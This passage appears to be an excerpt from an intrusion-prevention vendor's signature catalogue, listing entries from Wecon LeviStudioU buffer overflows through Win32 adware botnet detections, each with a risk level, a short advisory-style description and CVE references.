Description: Improper validation of the length of the WordAddr attribute within the Alarm tag in UMP files causes a stack buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Wecon-LeviStudioU-Alarm-Tag-WordAddr-Stack-Buffer-Overflow
Back to top

Wecon-LeviStudioU-Baseset-Entertime-And-Powerentertime-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1447-5242
Last changed: sgpkg-ips-1447-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper validation of the length of user-supplied data in EnterTime and PowerEnterTime attributes within the BaseSet Tag of UMP files causes a stack buffer overflow in Wecon LeviStudioU. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Wecon-LeviStudioU-Baseset-Entertime-And-Powerentertime-Stack-Buffer-Overflow
References:
CVE-2021-43983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43983
Back to top

Wecon-LeviStudioU-Baseset-Hminame-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1431-5242
Last changed: sgpkg-ips-1431-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper validation of data in the BaseSet tag of received UMP files causes a buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit can allow an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Wecon-LeviStudioU-Baseset-Hminame-Stack-Buffer-Overflow
References:
CVE-2021-43983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43983
Back to top

Wecon-LeviStudioU-Baseset-Scridwordaddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: High
First detected in: sgpkg-ips-1460-5242
Last changed: sgpkg-ips-1460-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in Wecon LeviStudioU. The vulnerability is due to improper validation of the length of user-supplied data in ScrIdWordAddr attribute within the BaseSet Tag of UMP files. A remote attacker could exploit this vulnerability by enticing a user into opening a crafted UMP file. Successful exploitation could allow the attacker to execute arbitrary code under the context as SYSTEM.
Situation: File-TextId_Wecon-LeviStudioU-Baseset-Scridwordaddr-Stack-Buffer-Overflow
References:
CVE-2021-43983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43983
Back to top

Wecon-LeviStudioU-CharSize-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in WECON LeviStudioU
Risk: High
First detected in: sgpkg-ips-1299-5242
Last changed: sgpkg-ips-1299-5242
Platform: Linux; Windows
Software: Wecon LeviStudio
Type: Input Validation
Description: There exists a stack buffer overflow vulnerability in Wecon LeviStudiU, version 1.8.80, which allows remote attackers to execute arbitrary code via a specially crafted HSC file, due to the improper validation of the length of data in the CharSize attribute.
Situation: File-TextId_Wecon-LeviStudioU-CharSize-Stack-Buffer-Overflow
References:
CVE-2020-16243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16243
Back to top

Wecon-LeviStudioU-Disc-Tag-WordAddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper validation of the length of user-supplied data in UMP files causes a stack buffer overflow in Wecon LeviStudioU. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Wecon-LeviStudioU-Disc-Tag-WordAddr-Stack-Buffer-Overflow
Back to top

Wecon-LeviStudioU-Hft-File-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1299-5242
Last changed: sgpkg-ips-1299-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper validation of the length of user-supplied data in HFT files causes a stack buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit can allow an attacker to execute arbitrary code with the privileges of the affected process.
Situation: File-Binary_Wecon-LeviStudioU-Hft-File-Parsing-Stack-Buffer-Overflow
References:
CVE-2020-16243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16243
Back to top

Wecon-LeviStudioU-Hft-File-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in WECON LeviStudioU
Risk: High
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Wecon LeviStudio, versions Build 2019-09-21 and prior, which allows remote attackers to excute arbitrary code due to the insufficient validation of the length of user-supplied data in HFT files.
Situation: File-Binary_Wecon-LeviStudioU-Hft-File-Stack-Buffer-Overflow
References:
CVE-2020-16243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16243
Back to top

Wecon-LeviStudioU-MultiLink-Bitaddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in WECON LeviStudioU
Risk: High
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in WECON LeviStudioU which allows remote attackers to execute arbitrary code due to the insufficient validation of the length of user-supplied data in the MultiLink tag of UMP files.
Situation: File-TextId_Wecon-LeviStudioU-MultiLink-Bitaddr-Stack-Buffer-Overflow
Back to top

Wecon-LeviStudioU-MultiLink-WordAddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudiU
Risk: High
First detected in: sgpkg-ips-1285-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in LeviStudiU which allows remote attackers to exploit arbitrary code due to improper validation of user supplied data in the MultiLink tag of UMP files.
Situation: File-TextId_Wecon-LeviStudioU-MultiLink-WordAddr-Stack-Buffer-Overflow
Back to top

Wecon-LeviStudioU-Screeninfo-Scrnfile-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1467-5242
Last changed: sgpkg-ips-1467-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper validation of the length of attribute value in the .ump project XML file causes a heap buffer overflow in Wecon LeviStudioU. A successful exploit allows an attacker to executer arbitrary code on the target system.
Situation: File-TextId_Wecon-LeviStudioU-Screeninfo-Scrnfile-Heap-Buffer-Overflow
References:
CVE-2021-23157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23157
Back to top

Wecon-LeviStudioU-Trend-WordAddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: Improper validation of the length of user-supplied data in WordAddr-related attributes within the Trend Tag in UMP project files causes a buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Wecon-LeviStudioU-Trend-WordAddr-Stack-Buffer-Overflow
References:
CVE-2021-43983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43983
Back to top

Wecon-LeviStudioU-Xyset-WordAddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon LeviStudioU
Risk: Moderate
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon LeviStudio
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in Wecon LeviStudiU. The vulnerability is due to improper validation of the length of user-supplied data in the XYSet tag of UMP files. A remote attacker could exploit this vulnerability by enticing a user into opening a crafted UMP file. Successful exploitation could allow the attacker to execute arbitrary code under the context of users.
Situation: File-TextId_Wecon-LeviStudioU-Xyset-WordAddr-Stack-Buffer-Overflow
Back to top

Wecon-Pistudio-Basedll-Textcontent-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Wecon PI Studio HMI Project Programmer
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wecon PIStudio
Type: Buffer Overflow
Description: Improper parsing of TextContent elements in a HSC configuration file causes a stack-based buffer overflow vulnerability in Wecon PIStudio. A successful exploit allows an attacker to execute arbitrary code with the privileges of the target process.
Situation: File-TextId_Wecon-Pistudio-Basedll-Textcontent-Stack-Based-Buffer-Overflow
Back to top

Weintek-Easybuilder-Pro-Cmt-Series-Project-File-Directory-Traversal

About this vulnerability: A vulnerability in Weintek EasyBuilder Pro cMT Series
Risk: Moderate
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Generic
Software: Weintek EasyBuilder Pro cMT Series
Type: Directory Traversal
Description: A directory traversal vulnerability exists in Weintek EasyBuilder Pro cMT Series. The vulnerability is due to a lack of proper input validation when compiling project files. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted project file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: File-Binary_Weintek-Easybuilder-Pro-Cmt-Series-Project-File-Directory-Traversal
References:
CVE-2023-0104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0104
Back to top

WellinTech-Kingscada-Kxnetdispose-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in WellinTech KingSCADA
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WellinTech KingSCADA
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in WellinTech KingSCADA. The vulnerability is due to insufficient validation on the size of the data. The vulnerable module is kxNetDispose.dll. The vulnerability, if exploited, results in the overwriting of the structured exception handler (SEH) in the AEserver.exe process listening on port 12401/TCP. A remote unauthenticated attacker could exploit this vulnerability by sending a malicious packet to the KingSCADA server. Successful exploitation could lead to remote code execution under the security context of a privileged system user.
Situation: Generic_CS-WellinTech-Kingscada-Kxnetdispose-Stack-Buffer-Overflow
References:
CVE-2014-0787
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0787
BID-66709
http://www.securityfocus.com/bid/66709
OSVDB-105574
http://www.osvdb.org/105574
Back to top

WellinTech-KingView-Kingmess-Log-File-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in WellinTech KingView
Risk: Moderate
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WellinTech KingView
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in KingView's KingMess. The vulnerability is due to an error while parsing log files. An attacker can exploit this vulnerability by enticing a user to open a specially crafted log file. This can lead to a buffer overflow and possibly code execution in the context of the affected application. If code execution is unsuccessful, the application may terminate unexpectedly.
Situation: File-Binary_WellinTech-KingView-Kingmess-Log-File-Parsing-Buffer-Overflow
References:
CVE-2012-4711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4711
OSVDB-89690
http://www.osvdb.org/89690
Back to top

WellinTech-KingView-SCADA-Heap-Buffer-Overflow

About this vulnerability: A heap bufferflow vulnerability in WellingTech Kingview
Risk: High
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WellinTech KingView
Type: Buffer Overflow
Description: WellingTech Kingview contains a boundary error vulnerability when handling remote requests. Remote attackers could exploit this vulnerability by sending a malicious request to the target service. The exploit can potentially lead to arbitrary code execution or denial of service.
Situation: Generic_CS-WellinTech-KingView-SCADA-Heap-Buffer-Overflow
Generic_CS-WellinTech-KingView-SCADA-Heap-Buffer-Overflow-2
References:
CVE-2011-0406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0406
BID-45727
http://www.securityfocus.com/bid/45727
OSVDB-70366
http://www.osvdb.org/70366
Back to top

WellinTech-KingView-SCADA-Historyserver.exe-Opcode-3-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in WellinTech KingView
Risk: Moderate
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WellinTech KingView
Type: Buffer Overflow
Description: WellinTech KingView is a high-performance production SCADA software. KingView is widely used in power, water conservancy, buildings, coal mines, environmental protection, metallurgy and so on. A buffer overflow vulnerability exists in WellinTech KingView. The vulnerability is due to a boundary error while handling remote opcode 3 requests. Remote, unauthenticated attackers could exploit this vulnerability by sending a malicious request to the target service. Successful exploitation would cause injection and execution of arbitrary code in the context of the SYSTEM user. Unsuccessful attack attempts will terminate the service causing a denial-of-service (DoS) condition.
Situation: Generic_CS-WellinTech-KingView-SCADA-Historyserver.exe-Heap-Buffer-Overflow
References:
CVE-2011-4536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4536
OSVDB-77992
http://www.osvdb.org/77992
Back to top

WellinTech-KingView-SCADA-KVWebSvr.dll-ActiveX-Contorl-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in WellinTech KingView
Risk: Moderate
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WellinTech KingView
Type: Buffer Overflow
Description: WellinTech KingView ActiveX control is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application, typically Internet Explorer, that uses the ActiveX control. Failed attacks will likely cause denial-of-service conditions.
Situation: File-Text_WellinTech-KingView-SCADA-KVWebSvr.dll-ActiveX-Contorl-Heap-Buffer-Overflow
References:
CVE-2011-3142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3142
BID-46757
http://www.securityfocus.com/bid/46757
OSVDB-72889
http://www.osvdb.org/72889
Back to top

WellinTech-Multiple-Products-Kxclientdownload-ActiveX-Remote-Code-Execution

About this vulnerability: A vulnerability in WellinTech KingGraphic
Risk: Moderate
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WellinTech KingGraphic; WellinTech KingSCADA
Type: Input Validation
Description: A remote code execution vulnerability exists in WellinTech multiple products. The vulnerability exists in ClientDownload.ocx ActiveX control and is due to insufficient sanitization of ProjectURL property. A remote unauthenticated attacker can leverage this vulnerability to download and load an arbitrary DLL file from a remote location. This can lead to code execution under the context of the administrator.
Situation: File-Text_WellinTech-Multiple-Products-Kxclientdownload-ActiveX-Remote-Code-Execution
References:
CVE-2013-2827
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2827
OSVDB-102135
http://www.osvdb.org/102135
Back to top

WePresent-WiPG-1000-Command-Injection

About this vulnerability: An attempt to exploit a WePresent WiPG-1000 Command Injection vulnerability detected
Risk: High
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: WePresent
Type: Code Injection
Description: A vulnerability in WePresent WiPG-1000, versions 2.0.0.7 and before, which allows remote attackers to execute commands via the rdfs.cgi script.
Situation: HTTP_CRL-WePresent-WiPG-1000-Command-Injection
Back to top

Werkzeug-Debugger-Remote-Code-Execution

About this vulnerability: Werkzeug Debugger Remote Code Execution
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Insecure Configuration
Description: Werkzeug is a widely used WSGI tool which includes a powerful debugger that can be used to execute code from within an internet browser. If the debug version of a web application faces the internet, a remote attacker can easily use it to execute remote code on the server running the application.
Situation: HTTP_CRL-Werkzeug-Debugger-Remote-Code-Execution
Back to top

Western-Digital-Arkeia-Remote-Code-Execution

About this vulnerability: An Western Digital Arkeia Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Arkeia Network Backup
Type: Insecure Configuration
Description: A vulnerability in Western Digital Arkeia Network Backup, versions 11.0.12 and before, which allows remote attackers to bypass authentication and execute arbitrary commands via crafted requests to the ARKFS_EXEC_CMD operation.
Situation: Generic_CS-Western-Digital-Arkeia-Remote-Code-Execution
References:
CVE-2015-7709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7709
Back to top

Western-Digital-Arkeia-Unauthenticated-Script-Upload

About this vulnerability: A Western Digital Arkeia Unauthenticated Script Upload vulnerability
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Western Digital Arkeia
Type: Insecure Configuration
Description: A vulnerability in Western Digital Arkeia, version 10.0.10, which allows remote attackers to have users execute arbitrary code by allowing file upload though the upload.php script, and local file inclusion in the lang cookie, without authentication.
Situation: HTTP_CSH-Western-Digital-Arkeia-Unauthenticated-Script-Upload
References:
OSVDB-97614
http://www.osvdb.org/97614
Back to top

Western-Digital-Multiple-Routers-Information-Disclosure

About this vulnerability: A vulnerability in multiple Western Digital Routers
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Western Digital My Net N600; Western Digital My Net N750; Western Digital My Net N900
Type: Malfunction
Description: There is an information disclosure vulnerability in multiple Western Digital routers which allows remote attackers to discover the cleartext administrator password.
Situation: HTTP_CSU-Western-Digital-Multiple-Routers-Information-Disclosure
References:
CVE-2013-5006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006
OSVDB-95519
http://www.osvdb.org/95519
Back to top

Western-Digital-MyCloud-Multi_uploadify-File-Upload-Vulnerability

About this vulnerability: A Western Digital MyCloud multi_uploadify File Upload vulnerability
Risk: High
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WD My Cloud NAS
Type: PHP Injection
Description: A vulnerability in Western Digital MyCloud NAS web service that allows remote attackers to upload malicious PHP scripts anywhere on the device's file system without authentication, resulting in arbitrary code execution.
Situation: HTTP_CRL-Western-Digital-MyCloud-Multi_uploadify-File-Upload-Vulnerability
References:
CVE-2017-17560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17560
Back to top

Western-Digital-MyCloud-Unauthenticated-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in Western Digital MyCloud detected
Risk: High
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Platform: Linux; Unix
Software: WD MyCloud
Type: Input Validation
Description: A vulnerability in Western Digital MyCloud, versions before 2.30.196, which allows remote attackers to bypass authentication (CVE-2018-17153), and execute arbitrary commands through the echo command via /web/google_analytics.php (CVE-2016-10108).
Situation: HTTP_CS-Western-Digital-MyCloud-Unauthenticated-Command-Injection
References:
CVE-2016-10108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10108
Back to top

WhatsUp-Gold-Registry-Overwrite-CVE-2024-8785

About this vulnerability: An attempt to exploit a vulnerability in Progress WhatsUp Gold detected
Risk: High
First detected in: sgpkg-ips-1807-5242
Last changed: sgpkg-ips-1807-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: Input Validation
Description: In WhatsUp Gold versions released before 2024.0.1, a remote unauthenticated attacker could leverage "NmAPI.exe" to create or change an existing registry value in registry path "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\". This could result in remote code execution.
Situation: Generic_CS-WhatsUp-Gold-Registry-Overwrite-CVE-2024-8785
References:
CVE-2024-8785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8785
Back to top

Wibu-Systems-Wibukey-Runtime-For-Windows-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Wibu-Systems WibuKey Runtime for Windows
Risk: Moderate
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WibuKey
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Wibu-Systems WibuKey Runtime for Windows. The vulnerability is due to a boundary error within the WkWin32.dll module when processing the "DisplayMessageDialog()" method. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.
Situation: File-Text_Wibukey-Runtime-For-Windows-ActiveX-Control-Buffer-Overflow
References:
OSVDB-87881
http://www.osvdb.org/87881
Back to top

WIKID-2fa-Enterprise-Server-ADM_usrs.jsp-Cross-Site-Scripting

About this vulnerability: A vulnerability in WiKID 2FA Enterprise Server
Risk: Moderate
First detected in: sgpkg-ips-1234-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WiKID 2FA Enterprise Server
Type: Input Validation
Description: There has been reported a cross-site scripting vulnerability in WiKID 2FA Enterprise Server. Successful exploitation could lead in arbitrary script code execution in the target user's web browser.
Situation: HTTP_CSU-WIKID-2fa-Enterprise-Server-ADM_usrs.jsp-Cross-Site-Scripting
References:
CVE-2019-17120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17120
Back to top

WIKID-2fa-Enterprise-Server-Getdomainhash-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WiKID 2FA Enterprise Server
Risk: Moderate
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WiKID 2FA Enterprise Server
Type: Input Validation
Description: There exists a stored cross-site scripting vulnerability exists in WiKID 2FA Enterprise Server. Successful exploitation could lead in arbitrary script code execution.
Situation: HTTP_CSU-WIKID-2fa-Enterprise-Server-Getdomainhash-Stored-Cross-Site-Scripting
References:
CVE-2019-17115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17115
Back to top

WIKID-2fa-Enterprise-Server-Groups.jsp-Cross-Site-Scripting

About this vulnerability: A vulnerability in WiKID 2FA Enterprise Server
Risk: Moderate
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WiKID 2FA Enterprise Server
Type: Input Validation
Description: A stored and reflected cross-site scripting vulnerability exists in WiKID 2FA Enterprise Server. This vulnerability is due to insufficient validation of the user-supplied group name sent to the groups.jsp script. A remote attacker can exploit this vulnerability by enticing a target user into clicking a malicious link. Successful exploitation could allow the attacker to execute arbitrary script code in the context of the user's browser.
Situation: HTTP_CRL-WIKID-2fa-Enterprise-Server-Groups.jsp-Cross-Site-Scripting
References:
CVE-2019-17116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17116
Back to top

WIKID-2fa-Enterprise-Server-InitDevice-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WiKID 2FA Enterprise Server
Risk: High
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WiKID 2FA Enterprise Server
Type: Input Validation
Description: A stored cross-site scripting vulnerability exists in WiKID 2FA Enterprise Server. This vulnerability is due to insufficient validation of the user-supplied data in InitDevice servlets during writing log messages. A remote, unauthenticated attacker can exploit this vulnerability by sending an HTTP request with crafted HTTP parameters to the target server. Successful exploitation could allow the attacker to execute arbitrary script code in the context of the user's browser.
Situation: HTTP_CRL-WIKID-2fa-Enterprise-Server-InitDevice-Stored-Cross-Site-Scripting
References:
CVE-2019-17115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17115
Back to top

WIKID-2fa-Enterprise-Server-Log.jsp-SQL-Injection

About this vulnerability: A vulnerability in WiKID 2FA Enterprise Server
Risk: High
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WiKID 2FA Enterprise Server
Type: Input Validation
Description: A vulnerability in WiKID 2FA Enterprise Server, versions before 4.2.0-b2053, which allows remote attackers to execute arbitrary SQL commands, due to the insufficient user input validation of Log.jsp.
Situation: HTTP_CRL-WIKID-2fa-Enterprise-Server-Log.jsp-SQL-Injection
References:
CVE-2019-17119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17119
Back to top

WIKID-2fa-Enterprise-Server-Preregister-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WiKID 2FA Enterprise Server
Risk: Moderate
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WiKID 2FA Enterprise Server
Type: Input Validation
Description: There exists a pre-auth stored cross-site scripting vulnerability in WiKID 2FA Enterprise Server. Successful exploitation could lead in arbitrary script execution.
Situation: HTTP_CRL-WIKID-2fa-Enterprise-Server-Preregister-Stored-Cross-Site-Scripting
References:
CVE-2019-17115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17115
Back to top

WIKID-2fa-Enterprise-Server-Processpref.jsp-SQL-Injection

About this vulnerability: A vulnerability in WiKID 2FA Enterprise Server
Risk: Moderate
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WiKID 2FA Enterprise Server
Type: Input Validation
Description: There exists an SQL injection vulnerability in WiKID 2FA Enterprise Server. Successful exploitation could lead in arbitrary SQL command execution.
Situation: HTTP_CRL-WIKID-2fa-Enterprise-Server-Processpref.jsp-SQL-Injection
References:
CVE-2019-17117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17117
Back to top

WIKID-2fa-Enterprise-Server-Searchdevices.jsp-SQL-Injection

About this vulnerability: A vulnerability in WiKID 2FA Enterprise Server
Risk: Moderate
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WiKID 2FA Enterprise Server
Type: Input Validation
Description: There exists a remotely exploitable post-auth SQL injection vulnerability in WiKID 2FA Enterprise Server. Successful exploitation could lead in arbitrary SQL command execution.
Situation: HTTP_CRL-WIKID-2fa-Enterprise-Server-Searchdevices.jsp-SQL-Injection
References:
CVE-2019-16917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16917
Back to top

WikkaWiki-Remote-PHP-Injection

About this vulnerability: A WikkaWiki Remote PHP Injection vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WikkaWiki
Type: Input Validation
Description: A vulnerability in WikkaWiki, versions 1.3.1 and 1.3.2, which allows remote attackers to write arbitrary PHP code to the spamlog_path file via the User-Agent HTTP header in an addcomment request.
Situation: HTTP_CS-WikkaWiki-Remote-PHP-Injection
References:
CVE-2011-4451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4451
OSVDB-77393
http://www.osvdb.org/77393
Back to top

WildFly-Jboss-Undertow-Directory-Traversal

About this vulnerability: A WildFly Jboss Undertow Directory Traversal vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: JBoss Undertow
Type: Directory Traversal
Description: A vulnerability in WildFly JBoss Undertow web server, version 8.1.0.Final, which allows remote attackers to read arbitrary files via a directory traversal in a resource URL.
References:
CVE-2014-7816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7816
Back to top

Win-FTP-Server-Wftpsrv.exe-List-FTP-Command-Buffer-Overflow

About this vulnerability: A vulnerability in Win FTP Server
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Win FTP Server
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Win FTP Server WFTPSRV.exe.
Situation: FTP_CS-Win-FTP-Server-Wftpsrv.exe-List-FTP-Command-Buffer-Overflow
References:
BID-33454
http://www.securityfocus.com/bid/33454
Back to top

Win32-OTF-Validation-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in font handling
Situation: File-Binary_Win32-OTF-Validation-Vulnerability
References:
CVE-2011-1873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1873
BID-48183
http://www.securityfocus.com/bid/48183
MS11-041
http://technet.microsoft.com/security/bulletin/MS11-041
Back to top

Win32.Adware.Hotclip.A-Botnet

About this vulnerability: Win32.Adware.Hotclip.A botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Adware.Hotclip.A is a malware that targets Windows hosts.
Situation: HTTP_CRL-Hotclip.A-Traffic
Back to top

Win32.Adware.Marketscore.B-Botnet

About this vulnerability: Win32.Adware.Marketscore.B botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Adware.Marketscore.B is a malware that targets Windows hosts. It is used to decrypt and track traffic.
Situation: HTTP_CRL-Marketscore.B-Traffic
Back to top

Win32.Adware.MediaGet-Botnet

About this vulnerability: Win32.Adware.MediaGet botnet
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Adware.MediaGet is an adware that targets Windows hosts.
Situation: HTTP_CSU_Adware.MediaGet-Download-Site
Back to top

Win32.Adware.SProtector.A-Botnet

About this vulnerability: Win32.Adware.SProtector.A botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Adware.SProtector.A is an adware that targets Windows hosts.
Situation: HTTP_CRL-SProtector.A-Traffic
Back to top

Win32.Adware.WebCake-Botnet

About this vulnerability: Win32.Adware.WebCake botnet
Risk: High
First detected in: sgpkg-ips-693-5211
